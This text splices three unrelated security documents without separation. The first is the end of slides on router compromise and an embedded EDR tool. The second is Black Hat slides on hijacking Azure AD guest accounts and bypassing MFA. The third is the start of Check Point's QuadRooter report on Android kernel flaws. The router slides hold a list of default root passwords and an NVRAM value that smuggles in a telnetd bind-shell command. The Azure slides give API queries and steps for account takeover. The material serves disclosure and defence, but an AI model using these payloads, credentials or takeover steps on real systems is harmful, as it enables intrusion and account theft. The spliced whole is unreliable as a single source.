NVRAM ○ logs ● Network 32 ● TMOUT=0 ● ENV=/etc/profile ● TZ=GMT-8 ● OLDPWD=/home Artificial Operator (ENV) 33 Process Detection SSH_CLIENT= 50589 22 USER=admin OLDPWD=/tmp/home/root HOME=/root SSH_TTY=/dev/pts/0 PS1=\u@\h:\w\$ LOGNAME=admin TERM=xterm-256color PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/adm in:/mmc/sbin:/mmc/bin:/mmc/usr/sbin:/mmc/usr /bin:/opt/sbin:/opt/bin:/opt/usr/sbin:/opt/u sr/bin SHELL=/bin/sh PWD=/tmp SSH_CONNECTION= 50589 Suspicious Process 34 parent process ? ● sshd ○ dropbear (ssh) ● web serverice ○ httpd ○ lighttpd Process Detection Unexpected Process ? ● SSH ● TELNET ● DDNS ● VPN Hardcoded key ● Telnet password ● Certifcate ● AES Key 35 File Detection openssl zlib -e %s | openssl -e %s openssl -d %s %s | openssl zlib -d -e %s %s -d %s %s -in %q -k %q -kfile /etc/secretkey 2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163 E39D67579EB344427F7836 360028C9064242F81074F4C127D299F6 -iv crypt_used_openssl enc_file Weak Password check your self by dictionary attack ● /usr/share/wordlist ● /usr/share/wfuzz/wordlist ● /usr/share/golismero/wordlist ● /usr/share/dirb/wordlist root xc3511 root vizxv root admin admin admin root 888888 root xmhdipc root default root juantech root 123456 root 54321 support support root (none) admin password root root root 12345 user user admin (none) root pass admin admin1234 root 1111 admin smcadmin admin 1111 root 666666 36 File Detection Persistence Attacker can re-package the firmware with several malware ● /etc/rc.d/ ● /etc/init.d/malware ● crontab ● nvram 37 File Detection ● NVRAM / Flash ○ /dev/nvram ○ /proc/mtd ○ /dev/mtd* NVRAM 38 NVRAM Boot Loader kernel File System MTD Partition Firmware mtd0: 0x00000000-0x00400000 : "ALL" mtd1: 0x00000000-0x00030000 : "Bootloader" mtd2: 0x00030000-0x00040000 : "Config" mtd3: 0x00040000-0x00050000 : "Factory" mtd4: 0x00050000-0x00360000 : "Kernel" mtd5: 0x00360000-0x003b0000 : "DATA" /proc/mtd File Detection Read NVRAM url_filter_rule=rule_1,www.google.com mac_filter_enable=1 mac_filter_max_num=24 mac_filter_mode=deny mac_filter_rule= mac_ipv6_filter_enable=1 telnetEnabled=0 WscCusPBCEnable=1 WscCusPINEnable=0 CusChannel=0 factory_mode=2 /dev/mtd2 39 NVRAM Boot Loader kernel File System MTD Partition Firmware File Detection Payload in NVRAM 40 NVRAM Boot Loader kernel File System MTD Partition Firmware File Detection url_filter_rule=rule_1,www.google.com$(telnet d -l sh -p 1337 -b, mac_filter_enable=1 mac_filter_max_num=24 mac_filter_mode=deny mac_filter_rule= mac_ipv6_filter_enable=1 telnetEnabled=0 WscCusPBCEnable=1 WscCusPINEnable=0 CusChannel=0 factory_mode=2 /dev/mtd2 Othres ● Fake Binary ○ Diff with firmware ○ File Modification Date ● logs ○ system logs - /jffs/syslog.log 41 File Detection DNS Hijacking 42 Network Detection resolve.conf DHCP option dnsmasq /etc/resolv.conf nameserver nameserver Sniffer ● One of inode exist /proc/net/packet probably is Sniffer (SOCKS_RAW) 43 Network Detection Suspicious Network ● Iptables ● HTTP Proxy ● Port Forwarding ● Reverse shell ● Reverse VPN client 44 Network Detection SOHO Router Security Solution 45 SOHO Router Security Solution ● ASUS: AiProtection Classic (PRO) By Trend Micro ● D-Link: D-Fend By McAfee ● TP-Link: HomeCare By Trend Micro ● NETGEAR: Armor By Bitdefender 46 Check Security Configartion 47 48 ASUS: AiProtection Classic (PRO) By Trend Micro /* PROTECTION EVENT */ {PROTECTION_INTO_MONITORMODE_EVENT ,0 ,"Intrusion Alert" ,"" }, {PROTECTION_VULNERABILITY_EVENT ,0 ,"Intrusion Prevention System Alert" ,"" }, {PROTECTION_CC_EVENT ,0 ,"Infected Device Detected and Blocked" ,"" }, {PROTECTION_DOS_EVENT ,0 ,"DoS Protection Alert" ,"" }, {PROTECTION_SAMBA_GUEST_ENABLE_EVENT ,0 ,"Securtiy Risk - Samba" ,"" }, {PROTECTION_FTP_GUEST_ENABLE_EVENT ,0 ,"Securtiy Risk - FTP " ,"" }, {PROTECTION_FIREWALL_DISABLE_EVENT ,0 ,"Securtiy Risk - Firewall Disable" ,"" }, {PROTECTION_MALICIOUS_SITE_EVENT ,0 ,"Malicious Site Access Blocked" ,"" }, {PROTECTION_WEB_CROSS_SITE_EVENT ,0 ,"Security Event Notice - Web Cross-site Scripting!" ,"" }, {PROTECTION_IIS_VULNERABILITY_EVENT ,0 ,"Security Event Notice - Microsoft IIS Vulnerability!" ,"" }, {PROTECTION_DNS_AMPLIFICATION_ATTACK_EVENT ,0 ,"Security Event Notice - DNS Amplification Attack!" ,"" }, {PROTECTION_SUSPICIOUS_HTML_TAG_EVNET ,0 ,"Security Event Notice - Suspicious HTML Iframe tag!" ,"" }, {PROTECTION_BITCOIN_MINING_ACTIVITY_EVENT ,0 ,"Security Event Notice - Bitcoin Mining Activity!" ,"" }, {PROTECTION_MALWARE_RANSOM_THREAT_EVENT ,0 ,"Security Event Notice - Malware Ransomware Threat!" ,"" }, {PROTECTION_MALWARE_MIRAI_THREAT_EVENT ,0 ,"Security Event Notice - Malware Mirai Threat!" ,"" }, 49 ASUS: AiProtection Classic (PRO) By Trend Micro if ( v43 & 2 ) { v6 = (int)&v91; snprintf( (char *)&v91, 0x3BFu, "SELECT timestamp, type, src, dst FROM monitor WHERE type=3 AND (timestamp > %ld AND timestamp < %ld) ORDER" " BY timestamp DESC", (char *)v12 - 130, v12); printf("sql = \"%s\"\n", &v91); sub_1750C(v71, &v91, "/jffs/.sys/AiProtectionMonitor/AiProtectionMonitorVPevent.txt"); } After pentest nothing alert ? 50 SOHO Router Security Solution ● Limited vender, limited model ● Protect client device rather than router devices ● Network-based Detection, does not provide protection against … ○ pentesting ○ evil payload ○ disable protection 51 Improvement Router Security Mechanism ● Package signing ● Package encrypted ● GCC Protection (SSP) ● Separate users for processes ● Procd jail 52 An Embedded System Detection and Response 53 SOHO Router Security Solution ● Limited vender, limited model ● Protect client device ● Network-based Detection 54 SOHO Router Security Solution ● Limited vender, limited model → Cross-Branding & Cross-Platform ● Protect client device → Protect router itself ● Network-based Detection → Behavior-based Detection 55 An Embedded System Detection and Response 56 ● Cross-Branding ○ ASUS / ROG / Synology / D-Link / TP-Link / TOTOLINK / ... ● Cross-Platform ○ i386 / amd64 / arm / arm64 / mips32 / mips64 ● Support Open Source IoC ● Support MITRE ATT&CK 57 An Embedded System Detection and Response An Embedded System Detection and Response ● Focus on the Embedded System itself ○ Router, NAS, IPCam, RPi ● Behavior-based Detection: Scans Process / File / Network / NVRAM ● Automaticity identifying the APT & Botnet Threats 58 LEAYA Architecture Web Server Client Agents 59 LEAYA Features ● IoC auto-update ● Easy Setup & Update Agent ● LEAYA + Raspberry pi 60 LEAYA Detections ● Process ● File ● Network ● NVRAM 62 63 64 CHECK PROCESS 65 66 67 68 69 70 CHECK FILE 71 72 73 CHECK NETWORK 74 75 76 CHECK NVRAM 77 78 79 ● APT uses various 1-day router exploits to compromise routers, the advances to attack endpoints of subnetwork ● We research attack techniques and how to identify them ● According to our researched, current security solution of routers on the market exist High Risk because the router didn’t protect itself ● Discuss how to secure routers ● We implemented a cross-platform EDR for Embedded Systems Conclusion 80 Q&A ? ? ? 81
#BHUSA @BlackHatEvents Backdooring and hijacking Azure AD accounts by abusing external identities Dirk-jan Mollema / @_dirkjan #BHUSA @BlackHatEvents Information Classification: General whoami - Dirk-jan Mollema - Lives in The Netherlands - Hacker / Researcher / Founder @ Outsider Security - Author of several (Azure) Active Directory tools - mitm6 - ldapdomaindump - BloodHound.py - aclpwn.py - Co-author of ntlmrelayx - ROADtools - Blogs on dirkjanm.io - Tweets stuff on @_dirkjan #BHUSA @BlackHatEvents Information Classification: General • Azure AD • Identity platform for Office 365, Azure Resource Manager, and other Azure things • Also identity platform for any first/third party app you want to integrate with it • This is not about Azure infrastructure/VMs/etc Terminology #BHUSA @BlackHatEvents Information Classification: General • Tenant • A separate instance of Azure AD for an organization. • Most organizations have one primary tenant. • Important security boundary in Azure AD. • Identified by a GUID • Identified by at least a tenantname.onmicrosoft.com domain • Usually also identified by custom domains Terminology #BHUSA @BlackHatEvents Information Classification: General • External identity • Any identity that is not managed by your tenant • Can be another Azure AD tenant, Microsoft account, Google account or even just an email address. Terminology #BHUSA @BlackHatEvents Information Classification: General External collaboration Tenant A Tenant B #BHUSA @BlackHatEvents Information Classification: General External collaboration Tenant A Resource tenant Tenant B Home tenant Guest account Home tenant account Linked #BHUSA @BlackHatEvents Information Classification: General • How does the invite flow work? • How are accounts linked to a different tenant? • What possibilities are there to abuse this? Research questions #BHUSA @BlackHatEvents Information Classification: General • 2 tenants: • Primary: Iminyour.cloud (iminyourcloud.onmicrosoft.com) • External: Crosstenantdev (crosstenantdev.onmicrosoft.com) • No specific B2B trust configured • All Azure AD defaults Test setup #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General • Microsoft Graph • Official API for everything Microsoft 365 (including Azure AD) • Not always all information • Azure AD graph • Azure AD only • Lower-level API than MS Graph • Possibility to use internal versions to gather more information • Azure AD portal • May use MS Graph or AAD Graph, including internal versions Azure AD information resources #BHUSA @BlackHatEvents Information Classification: General • Mix of AAD Graph and MS Graph • Use of ROADrecon (part of ROADtools) as front-end for AAD Graph In this talk #BHUSA @BlackHatEvents Information Classification: General Invite acceptance, audit log #BHUSA @BlackHatEvents Information Classification: General Guest account – after acceptance #BHUSA @BlackHatEvents Information Classification: General Link is based on “netid” property in home tenant #BHUSA @BlackHatEvents Information Classification: General Linking guest accounts between tenants Tenant A Resource tenant Tenant B Home tenant Guest account alternativeSecurityIds Home tenant account netid #BHUSA @BlackHatEvents Information Classification: General Inviting users using the AAD Graph https://github.com/projectKudu/ARMClient/wiki/AAD-Invite-User-Apis #BHUSA @BlackHatEvents Information Classification: General • Needs external users netid • Can be queried using AAD Graph • Can be extracted from access token (puid claim) • Need invite ticket • Can be queried using AAD Graph / ROADrecon ☺ Redeem invite via AAD Graph #BHUSA @BlackHatEvents Information Classification: General Redeem invite via API #BHUSA @BlackHatEvents Information Classification: General • You would think some privileged role is needed to redeem invites, this is not true, any user in the tenant can do it. • None of the information is verified: • Could use any “accepted as” email • Could link it to any external account in any directory • Invite tickets can be queried by any user in the tenant Redeeming invites: some issues #BHUSA @BlackHatEvents Information Classification: General • Query using AAD Graph: Hijacking invites https://graph.windows.net/myorganization/users?api-version=1.61-internal&$filter=userState eq 'PendingAcceptance'&$select=userPrincipalName,inviteTicket,userType,invitedAsMail #BHUSA @BlackHatEvents Information Classification: General Query netid from rogue account https://graph.windows.net/myorganization/users/newlowpriv@crosstenantdev.onmicrosoft.com/?api-version=1.61- internal&$select=userPrincipalName,netId #BHUSA @BlackHatEvents Information Classification: General Redeem invite POST response #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General No way to determine actual account link #BHUSA @BlackHatEvents Information Classification: General • Every user could query for non-redeemed invites. • Could redeem invite without any validation, link to arbitrary external account. • No way for admins to find out which account it was actually linked to. TL;DR #BHUSA @BlackHatEvents Information Classification: General • External identities often used for managing Azure subscriptions in other tenants. • Used for external suppliers/MSP accounts. • Leaving employee could add guest account to retain access. • UI flow exists to directly assign role to invited account, could be a privilege escalation. • Bypasses allowlist of external collaboration domains. Impact scenarios #BHUSA @BlackHatEvents Information Classification: General Hunting for abuse #BHUSA @BlackHatEvents Information Classification: General Hunting query AuditLogs | where OperationName =~ "Update user" | where Result =~ "success" | mv-expand target = TargetResources | where tostring(InitiatedBy.user.userPrincipalName) has "@" or tostring(InitiatedBy.app.displayName) has "@" | extend targetUPN = tostring(TargetResources[0].userPrincipalName) | extend targetId = tostring(TargetResources[0].id) | extend targetType = tostring(TargetResources[0].type) | extend modifiedProps = TargetResources[0].modifiedProperties | extend initiatedUser = tostring(InitiatedBy.user.userPrincipalName) | mv-expand modifiedProps | where modifiedProps.displayName =~ "UserState" | mv-expand AdditionalDetails | where AdditionalDetails.key =~ "UserType" and AdditionalDetails.value =~ "Guest" | extend new_value_set = parse_json(tostring(modifiedProps.newValue)) | extend old_value_set = parse_json(tostring(modifiedProps.oldValue)) | where new_value_set[0] =~ "Accepted" and old_value_set[0] =~ "PendingAcceptance" | project-away old_value_set, new_value_set, modifiedProps Copy/paste version: https://gist.github.com/dirkjanm/ #BHUSA @BlackHatEvents Information Classification: General • MS Graph shows less information than AAD Graph • “identities” property can actually be modified with correct privs External identities in MS Graph https://graph.microsoft.com/beta/users/cd3a4c74-64ca-42b4-9448-601cabad969a/identities #BHUSA @BlackHatEvents Information Classification: General Other identity providers #BHUSA @BlackHatEvents Information Classification: General Email OTP in MS Graph and AAD Graph MS Graph AAD Graph #BHUSA @BlackHatEvents Information Classification: General • Global Admins • User Administrators • Apps with User.ManageIdentities.All privileges • Users can modify their own identities Who can modify the identities attribute? #BHUSA @BlackHatEvents Information Classification: General Azure AD “Users” Role Definition #BHUSA @BlackHatEvents Information Classification: General Given a time-limited or scope-limited access token with the correct MS Graph permissions, attackers can backdoor an account and link it to an external account. Users modify their own identities #BHUSA @BlackHatEvents Information Classification: General • Temporary account access • Limited scope access, for example through device code phishing • Application takeover or URL hijack with the appropriate scope Attack scenario’s #BHUSA @BlackHatEvents Information Classification: General Account identities: original #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General Add new identity (backdoor) #BHUSA @BlackHatEvents Information Classification: General Account identities after change #BHUSA @BlackHatEvents Information Classification: General Switching tenants #BHUSA @BlackHatEvents Information Classification: General Signed in as victim user #BHUSA @BlackHatEvents Information Classification: General Returning the account to the original state #BHUSA @BlackHatEvents Information Classification: General • User Administrators cannot reset passwords of Global Administrators • They can however modify the identity of a Global Admin (or any other user) • This way they can take over the account of a higher privileged user. Extra technique: elevation of privilege #BHUSA @BlackHatEvents Information Classification: General • Convert existing user to B2B account (Guest) User Admin to Global Admin with a few clicks #BHUSA @BlackHatEvents Information Classification: General Victim user #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General #BHUSA @BlackHatEvents Information Classification: General • A User Administrator can convert any account to B2B, including higher privileged accounts. • Can be done in GUI or with 2 simple POST requests to MS Graph. • No need to redeem the invite with a real account if we combine this with the guest account hijack technique, making it fully invisible which account it was linked to. • For some reason does not work for accounts with a mailbox, in which case changing the “identities” property works. User Administrator privesc TL;DR #BHUSA @BlackHatEvents Information Classification: General • Converting a user to B2B or changing their identities will compromise their primary authentication method only. • MFA will still kick in for the original account. The caveat: MFA #BHUSA @BlackHatEvents Information Classification: General Guest tenants and MFA Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Victim account MFA methods Attacker account MFA methods #BHUSA @BlackHatEvents Information Classification: General MFA methods remain those of victim account Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Guest account Victim MFA methods Attacker account MFA methods Linked #BHUSA @BlackHatEvents Information Classification: General • In a fresh sign-in session where MFA was performed, we are not prompted for MFA every time we switch apps. Suggests caching in login session. • This holds for activity in tenants where we are a guest too. • Conclusion: MFA information is cached somehow in our session, and keeps track of which tenants we performed MFA in. Observations #BHUSA @BlackHatEvents Information Classification: General Introducing account rebinding Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Victim account Victim MFA methods Attacker account MFA methods #BHUSA @BlackHatEvents Information Classification: General Invite attacker as guest Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Victim account Victim MFA methods Attacker account MFA methods Attacker guest account Attacker MFA methods Linked #BHUSA @BlackHatEvents Information Classification: General Delete guest account Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Victim account Victim MFA methods Attacker account MFA methods Attacker guest account Attacker MFA methods #BHUSA @BlackHatEvents Information Classification: General Rebind victim account to attacker identity Tenant A Resource tenant Tenant B Home tenant (attacker controlled) Victim account Victim MFA methods Attacker account MFA methods Attacker guest account Attacker MFA methods Linked #BHUSA @BlackHatEvents Information Classification: General Video demo #BHUSA @BlackHatEvents Information Classification: General Add own MFA method to make bypass permanent #BHUSA @BlackHatEvents Information Classification: General • MFA information seems cached in the session based on home tenant identity + target tenant combination. • No link to the actual account, makes it possible to: • Invite a guest account on attacker's email address. • Register MFA information (will be cached in session) • Delete the guest account by leaving the organization. • Link the victim account to the attackers account (either B2B link or via Email OTP). • Attacker can now log in as victim, including MFA claim, and add their own MFA app. Attack summary #BHUSA @BlackHatEvents Information Classification: General • With limited account access (such as access token): • Convert into full persistent access, including MFA • With only access to the account password: • Bypass MFA and Conditional Access if MFA is not required for all apps/locations. • With a user administrator: • Elevate privileges to Global Admin, including MFA bypass. • Bypass MFA for any other account in the tenant. Attack scenarios and impact #BHUSA @BlackHatEvents Information Classification: General • TBD Fix status #BHUSA @BlackHatEvents Information Classification: General • Remove guest accounts with unredeemed invites regularly. • Lock down guest invite rights and guest access settings in Azure AD. • Hunt in your Audit logs for possible abuse of guest accounts. • Ask yourself how you could know which account a guest account is actually linked to with the information visible in Azure. • Enforce MFA across all apps instead of selectively. Actions for defenders Hunting query at https://gist.github.com/dirkjanm/ #BHUSA @BlackHatEvents Backdooring and hijacking Azure AD accounts by abusing external identities Dirk-jan Mollema / @_dirkjan Questions: dirkjan@outsidersecurity.nl
©2016 Check Point Softw are Technologies Ltd. All rights reserved | P. 1 INTRODUCTION The cloak-and-dagger of cybercrime makes for entertaining theater. That’s especially true for sensational breaches often caused by malware or other sophisticated attacks. Behind the drama though are some inherent vulnerabilities making these attacks possible. A myriad of device models, operating system versions, and unique software modifications makes handling Android vulnerabilities a challenge. The earlier these vulnerabilities are born in the supply chain, the more difficult they are to fix. Fixes require mind-bending coordination between suppliers, manufacturers, carriers and users before patches make it from the drawing board to installation. The fragmented world of Android leaves many users exposed to risk, even with out-of-the-box devices. In this report, the research team details four newly-discovered vulnerabilities affecting over 900 million Android smartphones and tablets. If exploited, each of these can give attackers complete control of devices and access to sensitive personal and enterprise data on them. QUADROOTER QuadRooter is a set of four vulnerabilities affecting Android devices built on Qualcomm® chipsets. The world’s leading designer of LTE chipsets, Qualcomm owns a 65% share of the LTE modem baseband market.1 1 ABI Research: https://www.abiresearch.com/press/abi-research-reports-qualcomm-maintains-clear-lead/ QUADROOTER NEW VULNERABILITIES AFFECTING OVER 900 MILLION ANDROID DEVICES by the Check Point Research Team ©2016 Check Point Software Technologies Ltd. All rights reserved. | 2 WHAT IS ROOTING? Rooting enables administrative control of a device and allows apps to run privileged commands not usually available on factory-configured devices. An attacker can use these commands to perform operations like changing or removing system-level files, deleting or adding apps, as well as accessing hardware on the device, including the touchscreen, camera, microphone, and other sensors. If any one of the four vulnerabilities is exploited, an attacker can trigger privilege escalations and gain root access to a device. An attacker can exploit these vulnerabilities using a malicious app. These apps require no special permissions to take advantage of these vulnerabilities, alleviating any suspicion users may have when installing. The vulnerabilities are found in Qualcomm’s software drivers that come with its chipsets. The drivers, controlling communication between chipset components, become incorporated into Android builds manufacturers develop for their devices. Pre-installed on devices at the point of manufacturing, these vulnerable drivers can only be fixed by installing a patch from the distributor or carrier. Distributors and carriers can only issue patches after receiving fixed driver packs from Qualcomm. The research team provided Qualcomm with information about the vulnerabilities in April 2016. The team then followed the industry-standard disclosure policy (CERT/CC policy) of allowing 90 days for patches to be produced before disclosing these vulnerabilities to the public. Qualcomm reviewed these vulnerabilities, classified each as high risk, and confirmed that it released patches to original equipment manufacturers (OEMs). This affects an estimated 900 million Android devices manufactured by OEMs like Samsung, HTC, Motorola, LG and more. In fact, some of the latest and most popular Android devices found on the market today use the vulnerable Qualcomm chipsets including: ©2016 Check Point Software Technologies Ltd. All rights reserved. | 3 BlackBerry Priv Blackphone 1 and 2 Google Nexus 5X, 6 and 6P HTC One M9 and HTC 10 LG G4, G5, and V10 New Moto X by Motorola OnePlus One, 2 and 3 Samsung Galaxy S7 and S7 Edge Sony Xperia Z Ultra Unique vulnerabilities affect four modules. Each vulnerability impacts a device’s entire Android system: IPC Router (inter-process communication) The ipc_router module provides inter-process communication for various Qualcomm components, user mode processes, and hardware drivers. Ashmem (Android kernel anonymous shared memory feature) Android’s propriety memory allocation subsystem, Ashmem enables processes to share memory buffers efficiently. Android devices using Qualcomm chipsets use a modified ashmem system, providing easy access to the subsystem API from the GPU drivers. kgsl (kernel graphics support layer) & kgsl_sync (kernel graphics support layer sync) The Qualcomm GPU component kgsl is a kernel driver that renders graphics by communicating with user-mode binaries. While this driver includes many modules, kgsl_sync is the one responsible for synchronization between the CPU and apps. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 4 FRAGMENTATION VISUALIZED A number of factors contribute to Android fragmentation including different Android builds for different device makers, models, carriers and distributors. WHY DOES THIS KEEP HAPPENING? THE SUPPLY CHAIN. Suppliers, like chipset makers, provide the hardware and software modules needed to manufacture smartphones and tables. Original equipment manufacturers (OEMs) combine these software modules, Android builds from Google, and their own customizations to create a unique Android build for a particular device. Distributors resell the devices, often including their own customizations and apps – creating yet another unique Android build. When patches are required, they must flow through this supply chain before making it onto an end user’s device. That process often takes weeks or even months. In-market Android devices as of August 2015. (Source: OpenSignal) ©2016 Check Point Software Technologies Ltd. All rights reserved. | 5 CONSUMERS MAY BE LEFT UNPROTECTED FOR LONG PERIODS OF TIME OR EVEN INDEFINITELY, BY ANY DELAYS IN PATCHING VULNERABILITIES ONCE THEY ARE DISCOVERED. – Federal Communications Commission RECOMMENDATIONS Vulnerabilities like QuadRooter bring the unique challenge of securing Android devices into focus: Fragmentation puts the responsibility of keeping Android devices and their data safe into the hands of a complex supply chain. Making patches and security updates available is resource and time- intensive – leaving users without protection while these are coded, tested, accepted and distributed. In-market devices that cannot support the latest versions of Android may not receive important security updates at all, leaving them exposed to new vulnerabilities. End-users remain poorly informed by retailers and employers on the risks of using mobile devices and networks, including the risks of rooting, downloading apps from third-party sources, and using public Wi-Fi® networks. These gaps not only put at risk the user’s personal information, but also any sensitive enterprise information that may be on their device. Stake holders throughout the Android supply chain continue to explore comprehensive solutions that address these concerns. They are no doubt motivated by the United States Federal Communications Commission2 2 Federal Communications Commission: https://www.fcc.gov/document/fcc-launches-inquiry-mobile-device- security-updates “ “ ©2016 Check Point Software Technologies Ltd. All rights reserved. | 6 and Federal Trade Commission3, which recently requested explanations from carriers and manufacturers for why the Android security update process is so badly broken. Unfortunately, reasonable solutions require coordination and standardization across the industry. Until then, Check Point continues to recommend these best practices to keep your Android devices safe: Download and install the latest Android updates as soon as they become available. These include important security updates that help keep your device and data protected. Understand the risks of rooting your device – either intentionally or as a result of an attack. Avoid side-loading Android apps (.APK files) or downloading apps from third-party sources. Instead, practice good app hygiene by downloading apps only from Google Play. Carefully read permission requests when installing apps. Be wary of apps that ask for unusual or unnecessary permissions or that use large amounts of data or battery life. Use known, trusted Wi-Fi networks. If traveling, use only networks you can verify are provided by a trustworthy source. Consider mobile security solutions that detect suspicious behavior on a device, including malware hiding in installed apps. 3 Federal Trade Commission: https://www.ftc.gov/news-events/press-releases/2016/05/ftc-study-mobile- device-industrys-security-update-practices ©2016 Check Point Software Technologies Ltd. All rights reserved. | 7 QUADROOTER TECHNICAL DETAILS CVE-2016-2059: Linux IPC router binding any port as a control port A kernel module introduced by Qualcomm, called ipc_router, contains the vulnerability. This module provides inter-process communication capabilities for various Qualcomm components, user mode processes, and hardware drivers. The module opens a unique socket (address family AF_MSM_IPC, 27) that adds propriety features to the normal IPC functionality such as: Assigning a predefined identification (ID) to each hardware module, allowing it to be addressed efficiently by any other component. Components can whitelist or blacklist other IDs, controlling and preventing communication from unprivileged endpoints. Anyone can monitor the creation or destruction of new AF_MSM_IPC sockets. A new AF_MSM_IPC socket always starts by default as a regular endpoint (no whitelist rules, and doesn’t receive any information when a new socket is created or destroyed). By issuing an IOCTL (IPC_ROUTER_IOCTL_BIND_CONTROL_PORT) on a regular socket (CLIENT_PORT), attackers can convert it to a monitoring socket (CONTROL_PORT). The vulnerability is located in the conversion function (figure 1), which uses a flawed locking logic to corrupt the monitoring sockets’ list. Corrupting the sockets’ list is possible by deleting port_ptr (an extension struct to the original struct socket) from its list, using list_del function and while the local_ports_lock_lhc2 lock is used. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 8 Figure 1: Conversion of a “CLIENT_PORT” socket to a “CONTROL_PORT” socket Calling this function on a monitoring socket removes the monitoring socket from its list while locking the regular sockets’ list, which has nothing to do with the monitoring sockets’ list. Attackers can use this vulnerability to corrupt control_ports list causing it to point to a free data, which they then control with heap spraying. Assuming an attacker can occupy the newly freed memory and control it, the kernel treats the sprayed memory like a regular msm_ipc_port object. As discussed, control_ports is a list of the monitoring sockets repeated each time notifications send for a socket creation or destruction. A function called post_control_ports notifies every item in the control_ports list. It goes over the list and calls the post_pkt_to_port function for each item. Figure 2 contains the functions source code, highlighting the variable representing a fake object. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 9 Figure 2: Function is called once the control_ports list is iterated, with the fake object marked. Faking a port_ptr allows for multiple methods of exploitation, as the object contains multiple function call primitives, information disclosure, and other helpful primitives. Attackers can take advantage of the lack of kASLR on Android devices and use the wake_up function. This function is a macro which eventually leads to a function called __wake_up_common (figure 3). ©2016 Check Point Software Technologies Ltd. All rights reserved. | 10 Figure 3: the __wake_up_common function. By using __wake_up_common, an attacker can completely control the content (but not the address) of the q argument. Controlling q allows attackers to manipulate control q->task_list, enabling the attacker to call any kernel-function and control most of the first argument4. Since it is an iterated list, the attacker can call as many functions as they wish. The vulnerability’s exploit goal is to gain root privileges while disabling SELinux. The discussed primitive disables SELinux (since it is possible to just call enforce_setup, passing a “0” string as the first parameter), however, it is not enough to call to the commit_creds function to gain root privileges. To call commit_creds successfully, the attacker must ensure it doesn’t defer a user space memory address in another thread, resulting in a kernel crash. To do so, it can pass the kernel’s 4 An attacker can only control most of the argument because the pointers to the function as well as the pointer to next are contained in curr. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 11 init_cred struct (shown in figure 4) as a first argument. This is possible due to the cred struct being statically allocated instead of allocated on the heap. However, since wake_up_common does not allow control of first argument memory address, another function that can must be found. Usb_read_done_work_fn is an excellent candidate. . Figure 4: The init_cred struct, representing the permission that the init process receives. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 12 Figure 5: usb_read_done_work_fn function is used as a gadget to improve function-call primitive. Since the first argument is controllable, so are the ch pointer and also the req pointer, (derived from the ch pointer). The last line of code in figure 5 is exactly what the attacker needs –a call to an arbitrary function while controlling the address of the parameters (req->buf is a pointer). By then chaining the function calls, the attacker can create a q- >task_list, granting root privileges and disabling SELinux. The first function called in the chain is qdisc_list_del, which allows the attacker to close the control_ports list, preventing a fake object from being used multiple times. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 13 The second function of the chain, enforcing_setup, sets up a pointer to a string that contains ‘0’. This value sets the SELinux status to “permissive”. The last chained function is commit_creds, which receives the function init_cred as the first argument. The function sets the UID to 0, elevating the maximum capabilities available on the system. CVE-2016-5340 Ashmem vulnerability Ashmem is Android’s propriety memory allocation subsystem that enables processes to efficiently share memory buffers. Devices using Qualcomm chipsets use a modified ashmem system that provides easy access to the subsystem API from the GPU drivers. The driver provides a convenient way to access an ashmem file’s struct file from a file descriptor. The driver supplies two new functions in the ashmem module to allow this: get_ashmem_file and put_ashmem_file. The function get_ashmem_file (figure 6) gets a file descriptor and checks whether the file descriptor points to an ashmem file. If the file descriptor points to it, the function extracts its private_data struct and returns it back to the caller. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 14 Figure 6: get_ashmem_file function added by Qualcomm to ease access to the ashmem API. The problem is in the is_ashmem_file function, which inappropriately checks the file type (figure 7). Figure 7: is_ashmem_file function. Obscure check for the file type of the given fd. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 15 Attackers can use a deprecated feature of Android, called Obb5 to create a file named ashmem on top of a file system. With this feature, an attacker can mount their own file system, creating a file in their root directory called “ashmem.” By sending the fd of this file to the get_ashmem_file function, an attacker can trick the system to think that the file they created is actually an ashmem file, while in reality, it can be any file. CVE-2016-2503, CVE-2106-2504 Use after free due to race conditions in KGSL CVE-2016-2503 One of Qualcomm’s GPU components is called “kgsl” (Kernel Graphics Support Layer). This kernel driver communicates with userland binaries to render graphics. While there are many modules in this driver, kgsl_sync is responsible for synchronization between the CPU and the apps. The vulnerability lies in the ‘destroy’ function. Creating and destroying this object can be done by IOCTLing the driver (/dev/kgsl-3d0) and sending the following IOCTLs: IOCTL_KGSL_SYNCSOURCE_CREATE IOCTL_KGSL_SYNCSOURCE_DESTROY 5 More information can be found at https://developer.android.com/google/play/expansion-files.html ©2016 Check Point Software Technologies Ltd. All rights reserved. | 16 Figure 8: kgsl_ioctl_syncsource_destroy function. Receives an ID of a syncsource object, checks for its preexistence and then destroys it. The function is prone to a race condition flaw, where two parallel threads call the function simultaneously. This could make the kernel force a context switch in one thread. This happens right after the kgsl_syncsource_get call to the second thread which will call this function too. Together, these two threads can pass the kgsl_syncsource_get before starting the refcount reduction. This drops the refcount of a syncsource object below 0, exposing itself to a use-after-free attack. CVE-2016-2504 Another vulnerability is found in the kernel graphics support layer driver when a module called kgsl creates an object called kgsl_mem_entry (representing a GPU memory). Since a user-space process can allocate and map memory to the GPU, it can both create and destroy a kgsl_mem_entry. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 17 The kgsl_mem_entry is created using a function called kgsl_mem_entry_create. The function allocates memory for the kgsl_mem_entry objects and upon success, sets the refcount to 1 using the kref mechanism. The allocated object is then passed to the function 